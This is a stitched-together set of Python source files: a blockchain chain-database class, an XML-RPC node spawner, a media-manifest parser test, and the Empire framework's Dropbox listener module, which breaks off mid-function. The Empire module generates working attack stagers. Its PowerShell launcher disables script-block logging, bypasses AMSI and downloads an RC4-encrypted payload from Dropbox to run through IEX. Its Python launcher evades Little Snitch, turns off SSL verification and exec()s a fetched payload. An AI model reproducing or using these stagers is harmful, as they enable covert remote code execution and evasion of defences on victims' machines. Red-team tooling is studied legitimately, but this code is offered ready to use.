def clear_txout(self, txhash, n_idx, batch=None):
txidx = self.gettxidx(txhash)
if txidx is None:
return False
txidx.spentmask &= ~(1 << n_idx)
self.puttxidx(txhash, txidx, batch)
return True
def unique_outputs(self, block):
outputs = {}
txmap = {}
for tx in block.vtx:
if tx.is_coinbase:
continue
txmap[tx.GetTxid()] = tx
for txin in tx.vin:
v = (txin.prevout.hash, txin.prevout.n)
if v in outputs:
return None
outputs[v] = False
return (outputs, txmap)
def db_sync(self):
self.checktransactions(force=True)
self.checkaddresses(force=True)
self.checkblocks(0, force=True)
self.checkutxos(force=True)
gevent.spawn_later(5, self.db_sync)
def haveblock(self, blkhash, checkorphans):
#TODO: add block cache
# if self.blk_cache.exists(blkhash):
# return True
if checkorphans and blkhash in self.orphans:
return True
ser_hash = b2lx(blkhash)
block = self.db.get(('blocks:'+ser_hash).encode())
return block is not None
def have_prevblock(self, block):
if self.getheight() < 0 and b2lx(block.GetHash()) == b2lx(self.params.GENESIS_BLOCK.GetHash()):
return True
if self.haveblock(block.hashPrevBlock, False):
return True
return False
def putoneblock(self, block, initsync=True):
if not self.have_prevblock(block):
self.orphans[block.GetHash()] = True
self.orphan_deps[block.hashPrevBlock] = block
self.log.warn("Orphan block %s (%d orphans)" % (b2lx(block.GetHash()), len(self.orphan_deps)))
return False
# if block.hashPrevBlock != self.gettophash():
# print("Cannot connect block to chain %s %s" % (b2lx(block.GetHash()), b2lx(self.gettophash())))
# return
top_height = self.getheight()
top_work = bytes_to_int(self.db.get(b'misc:total_work'))
prevmeta = BlkMeta()
if top_height >= 0:
ser_prevhash = b2lx(block.hashPrevBlock)
data = self.db.get(('blkmeta:'+ser_prevhash).encode())
prevmeta.deserialize(data)
else:
ser_prevhash = ''
# build network "block" msg, as canonical disk storage form
msg = msg_block()
msg.block = block
msg_data = msg.to_bytes()
# write "block" msg to storage
fpos = self.blk_write.tell()
self.blk_write.write(msg_data)
self.blk_write.flush()
with self.db.write_batch(transaction=True) as batch:
# add index entry
ser_hash = b2lx(block.GetHash())
key = ('blocks:'+ser_hash).encode()
value = struct.pack('i', fpos)
batch.put(key, value)
# store metadata related to this block
blkmeta = BlkMeta()
blkmeta.height = prevmeta.height + 1
blkmeta.work = (prevmeta.work + uint256_from_compact(block.nBits))
batch.put(('blkmeta:'+ser_hash).encode(), blkmeta.serialize())
# store list of blocks at this height
heightidx = HeightIdx()
heightstr = str(blkmeta.height)
d = self.db.get(('height:'+heightstr).encode())
if d:
heightidx.deserialize(d)
heightidx.blocks.append(block.GetHash())
batch.put(('height:'+heightstr).encode(), heightidx.serialize())
# print('height: %s' % blkmeta.height)
# print('blk: %s' % blkmeta.work)
# print('top: %s' % top_work)
# if chain is not best chain, proceed no further
if (blkmeta.work <= top_work):
self.log.info("ChainDb: height %d (weak), block %s" % (blkmeta.height, b2lx(block.GetHash())))
return True
# update global chain pointers
if not self.set_best_chain(ser_prevhash, ser_hash, block, blkmeta):
return False
return True
def set_best_chain(self, ser_prevhash, ser_hash, block, blkmeta):
# the easy case, extending current best chain
if (blkmeta.height == 0 or b2lx(self.db.get(b'misc:tophash')) == ser_prevhash):
c = self.connect_block(ser_hash, block, blkmeta)
#TODO: test
# if blkmeta.height > 0:
# self.disconnect_bl ock(block)
return c
# switching from current chain to another, stronger chain
return self.reorganize(block.GetHash())
def getblockmeta(self, blkhash):
ser_hash = b2lx(blkhash)
try:
meta = BlkMeta()
meta.deserialize(self.db.get(('blkmeta:'+ser_hash).encode()))
except KeyError:
return None
return meta
def getblockheight(self, blkhash):
meta = self.getblockmeta(blkhash)
if meta is None:
return -1
return meta.height
def reorganize(self, new_best_blkhash):
self.log.warn("REORGANIZE")
conn = []
disconn = []
old_best_blkhash = self.gettophash()
fork = old_best_blkhash
longer = new_best_blkhash
while fork != longer:
while (self.getblockheight(longer) > self.getblockheight(fork)):
block = self.getblock(longer)
conn.append(block)
longer = block.hashPrevBlock
if longer == 0:
return False
if fork == longer:
break
block = self.getblock(fork)
disconn.append(block)
fork = block.hashPrevBlock
if fork == 0:
return False
self.log.warn("REORG disconnecting top hash %s" % (b2lx(old_best_blkhash),))
self.log.warn("REORG connecting new top hash %s" % (b2lx(new_best_blkhash),))
self.log.warn("REORG chain union point %s" % (b2lx(fork),))
self.log.warn("REORG disconnecting %d blocks, connecting %d blocks" % (len(disconn), len(conn)))
conn.reverse()
for block in disconn:
if not self.disconnect_block(block):
return False
for block in conn:
if not self.connect_block(b2lx(block.GetHash()), block, self.getblockmeta(block.GetHash())):
return False
self.log.warn("REORGANIZE DONE")
return True
def _address_from_vout(self, txid, vout):
script = vout.scriptPubKey
if len(script) >= 38 and script[:6] == bitcoin.core.WITNESS_COINBASE_SCRIPTPUBKEY_MAGIC:
return
try:
script = CScript(vout.scriptPubKey)
if script.is_unspendable():
self.log.warn("Unspendable %s" % vout.scriptPubKey)
if vout.scriptPubKey[2:4] == b'\xfe\xab':
m = vout.scriptPubKey[4:].decode('utf-8')
Message.create(message=m)
return
return str(TX_CBitcoinAddress.from_scriptPubKey(script))
except:
self.log.warn('scriptPubKey invalid txid=%s scriptPubKey=%s value=%s' % (txid, b2lx(vout.scriptPubKey), vout.nValue))
def disconnect_block(self, block):
ser_prevhash = b2lx(block.hashPrevBlock)
prevmeta = BlkMeta()
prevmeta.deserialize(self.db.get(('blkmeta:'+ser_prevhash).encode()))
tup = self.unique_outputs(block)
if tup is None:
return False
outputs = tup[0]
# mark deps as unspent
with self.db.write_batch(transaction=True) as batch:
for output in outputs:
self.clear_txout(output[0], output[1], batch)
# update tx index and memory pool
for tx in block.vtx:
ser_hash = b2lx(tx.GetTxid())
batch.delete(('tx:'+ser_hash).encode())
if not tx.is_coinbase():
self.mempool_add(tx)
# update database pointers for best chain
batch.put(b'misc:total_work', int_to_bytes(prevmeta.work))
batch.put(b'misc:height', struct.pack('i', prevmeta.height))
batch.put(b'misc:tophash', lx(ser_prevhash))
# TODO:
# [x] Search block cache for block and marked as orphaned
# [x] Search transaction cache and delete
#
# [x] Mark block as orphaned
# [x] Remove transactions from transaction table, mempool add done above
# [x] Revert balance changes
#
# Disconnects happen infrequently so we can do these updates to postgres DB immediately
bhash = b2lx(block.GetHash())
key = ('pg_block:%s' % bhash).encode()
cached_block = self.db.get(key)
if cached_block:
cached_block = json.loads(cached_block.decode('utf-8'))
cached_block['orphaned'] = True
batch.put(key, (json.dumps(cached_block)).encode())
for tx in block.vtx:
if tx.is_coinbase():
continue
ser_hash = b2lx(tx.GetTxid())
key = ('pg_tx:%s' % ser_hash)
batch.delete(key)
Block.update(orphaned=True).where(Block.hash == b2lx(block.GetHash())).execute()
Transaction.delete().where(Transaction.block == b2lx(block.GetHash())).execute()
for tx in block.vtx:
txid = b2lx(tx.GetTxid())
for idx, vin in enumerate(tx.vin):
if tx.is_coinbase() and idx == 0:
continue
preaddress, prevalue = self.getutxo(b2lx(vin.prevout.hash), vin.prevout.n)
if preaddress in self.address_changes:
self.address_changes[preaddress]['balance'] += prevalue
self.address_changes[preaddress]['sent'] -= prevalue
else:
self.address_changes[preaddress] = {
'balance': prevalue,
'sent': -prevalue, # subtract from sent
'received': 0,
}
for idx, vout in enumerate(tx.vout):
address = self._address_from_vout(txid, vout)
value = vout.nValue
if address in self.address_changes:
self.address_changes[address]['balance'] -= value
self.address_changes[address]['received'] -= value
else:
self.address_changes[address] = {
'balance': -value,
'received': -value,
'sent': 0
}
self._update_address_index()
self.checkaddresses(force=True)
self.log.info("ChainDb(disconn): height %d, block %s" % (prevmeta.height, b2lx(block.hashPrevBlock)))
return True
def _update_address_index(self):
with self.db.write_batch(transaction=True) as addressBatch:
for key, addr in self.address_changes.items():
k = ('address:%s' % key).encode()
(balance, sent, received) = struct.unpack('lll', self.db.get(k, struct.pack('lll', 0, 0, 0)))
addressBatch.put(k, struct.pack('lll',
balance + addr['balance'],
sent + addr['sent'],
received + addr['received'],
))
self.address_change_count += 1
self.address_changes = {}
def connect_block(self, ser_hash, block, blkmeta):
# update database pointers for best chain
with self.db.write_batch(transaction=True) as wb:
wb.put(b'misc:total_work', int_to_bytes(blkmeta.work))
wb.put(b'misc:height', struct.pack('i', blkmeta.height))
wb.put(b'misc:tophash', lx(ser_hash))
self.log.info("ChainDb: height %d, block %s" % (blkmeta.height, b2lx(block.GetHash())))
bHash = b2lx(block.GetHash())
dt = datetime.utcfromtimestamp(block.nTime)
# self.db_sync()
if dt > datetime.utcnow() - timedelta(minutes=10) and self.initial_sync:
self.log.info('Chain has caught up')
self.initial_sync = False
self.db_sync()
height = blkmeta.height
timestamp = dt.timestamp()
wb.put(('pg_block:%s' % bHash).encode(), json.dumps({
'merkle_root': b2lx(block.hashMerkleRoot), # save merkle root as hex string
'difficulty': block.calc_difficulty(block.nBits), # save difficulty as both calculated and nBits
'timestamp': timestamp,
'version': block.nVersion, # we can do binary operation if saved as binary
'height': height,
'bits': block.nBits,
'nonce': block.nNonce,
'chainwork': blkmeta.work,
'size': len(block.serialize()),
'hash': bHash,
'coinbase': base64.encodebytes(block.vtx[0].vin[0].scriptSig).decode(),
'tx_count': len(block.vtx),
'tx': list(map(lambda tx : b2lx(tx.GetTxid()), block.vtx))
}).encode())
self.parse_vtx(block.vtx, wb, timestamp, block.GetHash(), height)
self._update_address_index()
self.checktransactions()
self.checkaddresses()
self.checkblocks(height)
self.checkutxos()
for key, value in self.utxo_cache.items():
wb.put(key, value)
self.utxo_cache = {}
return dt
def putblock(self, block):
with self.block_lock:
if self.haveblock(block.GetHash(), False):
self.log.info("Duplicate block %s submitted" % (b2lx(block.GetHash()), ))
return False
return self.putoneblock(block)
def puttxidx(self, txhash, txidx, spend=False, batch=None):
ser_txhash = int(txhash, 16)
self.db.get(('tx:'+txhash).encode())
old_txidx = self.gettxidx(txhash)
if old_txidx and not spend:
self.log.warn("overwriting duplicate TX %064x, height %d, oldblk %s, oldspent %x, newblk %s newspent %x" % (ser_txhash, 0, old_txidx.blkhash, old_txidx.spentmask, txidx.blkhash, txidx.spentmask))
batch = self.db if batch is not None else batch
value = (txidx.blkhash + ' ' + str(txidx.spentmask)).encode()
batch.put(('tx:' + txhash).encode(), value)
return True
def gettxidx(self, txhash):
ser_value = self.db.get(('tx:'+txhash).encode())
if not ser_value:
return None
ser_value = ser_value.decode('utf-8')
pos = ser_value.find(' ')
txidx = TxIdx(ser_value[:pos])
# txidx.blkhash = int(, 16)
txidx.spentmask = int(ser_value[pos+1], 16)
return txidx
def getblock(self, blkhash) -> CBlock:
# block = self.blk_cache.get(blkhash)
# if block is not None:
# return block
ser_hash = b2lx(blkhash)
try:
# Lookup the block index, seek in the file
fpos = self.db.get(('blocks:'+ser_hash).encode())
fpos = struct.unpack('i', fpos)[0]
self.blk_read.seek(fpos)
# read and decode "block" msg
msg = MsgSerializable.stream_deserialize(self.blk_read)
if msg is None:
return None
block = msg.block
except KeyError:
return None
# self.blk_cache.put(blkhash, block)
return block
def spend_txout(self, txhash, n_idx, batch=None):
txidx = self.gettxidx(txhash)
if txidx is None:
return False
txidx.spentmask |= (1 << n_idx)
self.puttxidx(txhash, txidx, spend=True, batch=batch)
return True
def txout_spent(self, txout):
txidx = self.gettxidx(b2lx(txout.hash))
if txidx is None:
return None
if txout.n > 100000: # outpoint index sanity check
return None
if txidx.spentmask & (1 << txout.n):
return True
return False
def tx_is_orphan(self, tx):
for txin in tx.vin:
rc = self.txout_spent(txin.prevout)
if rc is None: # not found: orphan
try:
txfrom = self.mempool.pool[b2lx(txin.prevout.hash)]
except:
return True
if txin.prevout.n >= len(txfrom.vout):
return None
if rc is True: # spent? strange
return None
return False
|
nest.py
|
#!/usr/bin/python3
import subprocess
import sys
import signal
import time
import threading
import socket
from xmlrpc.server import SimpleXMLRPCServer
from node import Node
import socketserver
class ThreadedXMLRPCServer(socketserver.ThreadingMixIn, SimpleXMLRPCServer):
pass
# GET IP ADDRESS AND PORT
def get_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
PORT = s.getsockname()[1]
except:
IP = '127.0.0.1'
PORT = 6969
finally:
s.close()
return IP, PORT
from pathlib import Path
def fresh_start():
for p in Path("./db/").glob("*.db"):
p.unlink()
for p in Path("./db/").glob("*.db-journal"):
p.unlink()
def spawn_node():
ADDRESS, PORT = get_address()
# start XML-RPC server
server = ThreadedXMLRPCServer((ADDRESS, int(PORT)), use_builtin_types=True, allow_none=True)
server.register_instance(Node(ADDRESS, PORT, TRACKER_ADDRESS))
print('-- Node running on ' + ADDRESS + ':' + str(PORT))
server.serve_forever()
fresh_start()
# params
n = int(sys.argv[1])
TRACKER_ADDRESS = sys.argv[2]
# container for processes
threads = []
for i in range(n):
t = threading.Thread(target=spawn_node, args=())
threads.append(t)
t.start()
print('Nest running...')
|
test_MParser.py
|
from unittest import TestCase
from manifestparser import MParser
import http.server
import socketserver
from threading import Thread
class TestMParser(TestCase):
_httpd = None
_httpdthread = None
_port = 8000
@classmethod
def setUpClass(cls):
handler = http.server.SimpleHTTPRequestHandler
cls._httpd = socketserver.TCPServer(("127.0.0.1", cls._port), handler)
cls._httpdthread = Thread(target=cls._httpd.serve_forever)
cls._httpdthread.start()
@classmethod
def tearDownClass(cls):
cls._httpd.shutdown()
cls._httpdthread.join()
def setUp(self):
self.hssvod = MParser("http://127.0.0.1:%d/testdata/To_The_Limit_720.ism_Manifest" % self._port)
self.dashvod = MParser(
"http://127.0.0.1:%s/testdata/Jezebels_Reich-Main_Movie-9221571562371948872_v1_deu_20_1080k-HEVC-SD_HD_HEVC_DASH.mpd_streamProfile_Dash-NoText" % self._port)
def test_hss(self):
self.assertTrue(self.hssvod.hss)
self.assertFalse(self.dashvod.hss)
def test_dash(self):
self.assertTrue(self.dashvod.dash)
self.assertFalse(self.hssvod.dash)
def test_vod(self):
self.assertTrue(self.hssvod.vod)
# self.assertTrue(self.dashvod.vod)
def test_live(self):
self.assertFalse(self.hssvod.live)
# self.assertFalse(self.dashvod.live)
def test_bitrates(self):
self.assertListEqual(self.hssvod.bitrates(MParser.VIDEO),
[2962000, 2056000, 1427000, 991000, 688000, 477000, 331000, 230000])
self.assertListEqual(self.hssvod.bitrates(MParser.AUDIO), [128000])
self.assertListEqual(self.dashvod.bitrates(MParser.VIDEO),
[150363, 409396, 756951, 1046799, 2119631, 4111492, 5472034])
self.assertListEqual(self.dashvod.bitrates(MParser.AUDIO), [128000])
def test_fragments(self):
values = list(self.hssvod.fragments(MParser.VIDEO, max, 30))
self.assertEqual(len(values), 15)
# values = list(self.dashvod.fragments(MParser.VIDEO, max, 30))
# self.assertEqual(len(values), 10)
|
dbx.py
|
import base64
import random
import os
import time
import copy
import json
import dropbox
# from dropbox.exceptions import ApiError, AuthError
# from dropbox.files import FileMetadata, FolderMetadata, CreateFolderError
from pydispatch import dispatcher
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import templating
from lib.common import obfuscation
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Dropbox',
'Author': ['@harmj0y'],
'Description': ('Starts a Dropbox listener.'),
'Category' : ('third_party'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'dropbox'
},
'APIToken' : {
'Description' : 'Authorization token for Dropbox API communication.',
'Required' : True,
'Value' : ''
},
'PollInterval' : {
'Description' : 'Polling interval (in seconds) to communicate with the Dropbox Server.',
'Required' : True,
'Value' : '5'
},
'BaseFolder' : {
'Description' : 'The base Dropbox folder to use for comms.',
'Required' : True,
'Value' : '/Empire/'
},
'StagingFolder' : {
'Description' : 'The nested Dropbox staging folder.',
'Required' : True,
'Value' : '/staging/'
},
'TaskingsFolder' : {
'Description' : 'The nested Dropbox taskings folder.',
'Required' : True,
'Value' : '/taskings/'
},
'ResultsFolder' : {
'Description' : 'The nested Dropbox results folder.',
'Required' : True,
'Value' : '/results/'
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 60
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 10
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
"""
Returns a default HTTP server page.
"""
return ''
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/dbx generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
# host = listenerOptions['Host']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
if language.startswith('po'):
# PowerShell
# replace with stager = '' for troubleshooting
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$val.Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$val}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.Ams'+'iUtils'"
stager += helpers.randomize_capitalization(');$Ref.GetField(')
stager += "'am'+'siInitFailed','NonPu'+'blic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+"=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;"
# TODO: reimplement stager retries?
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# add in the Dropbox auth token and API params
stager += "$t='%s';" % (apiToken)
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Authorization\",\"Bearer $t\");"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Dropbox-API-Arg\",'{\"path\":\"%s/debugps\"}');" % (stagingFolder)
stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData('")
stager += "https://content.dropboxapi.com/2/files/download');"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
elif language.startswith('py'):
launcherBase = 'import sys;'
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "t='%s';" % (apiToken)
launcherBase += "server='https://content.dropboxapi.com/2/files/download';"
launcherBase += "req=urllib2.Request(server);\n"
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header(\"Authorization\",\"Bearer \"+t);"
launcherBase += "req.add_header(\"Dropbox-API-Arg\",'{\"path\":\"%s/debugpy\"}');\n" % (stagingFolder)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/dbx generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/dbx generate_stager(): no language specified!')
return None
pollInterval = listenerOptions['PollInterval']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
apiToken = listenerOptions['APIToken']['Value']
profile = listenerOptions['DefaultProfile']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/dropbox.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# patch the server and key information
stager = stager.replace('REPLACE_STAGING_FOLDER', stagingFolder)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('REPLACE_POLLING_INTERVAL', pollInterval)
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('dropbox.py')
template_options = {
'staging_folder': stagingFolder,
'poll_interval': pollInterval,
'staging_key': stagingKey,
'profile': profile,
'api_token': apiToken
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
if encode:
return base64.b64encode(stager)
